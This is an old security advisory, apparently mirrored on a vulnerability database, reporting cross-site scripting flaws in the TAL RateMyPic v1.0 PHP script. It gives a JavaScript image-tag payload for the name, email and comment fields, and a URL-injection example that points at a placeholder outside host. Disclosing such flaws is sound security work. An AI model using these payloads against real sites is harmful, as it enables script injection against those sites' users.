Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12934
HistoryJun 02, 2006 - 12:00 a.m.

TAL RateMyPic v1.0

2006-06-0200:00:00
vulners.com
23
JSON

TAL RateMyPic v1.0

Homepage:
http://www.dominioseuropa.com/index.php

Effected files:
index.php
input boxes

XSS proof of concept:

By putting the following in the name, email, or comment boxes:

<IMG SRC=javascript:alert('XSS')>

And By URL Injection:
http://www.example.com/index.php?id=&lt;IMG&#37;20SRC=http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&gt;

Luny - http://www.youfucktard.com

JSON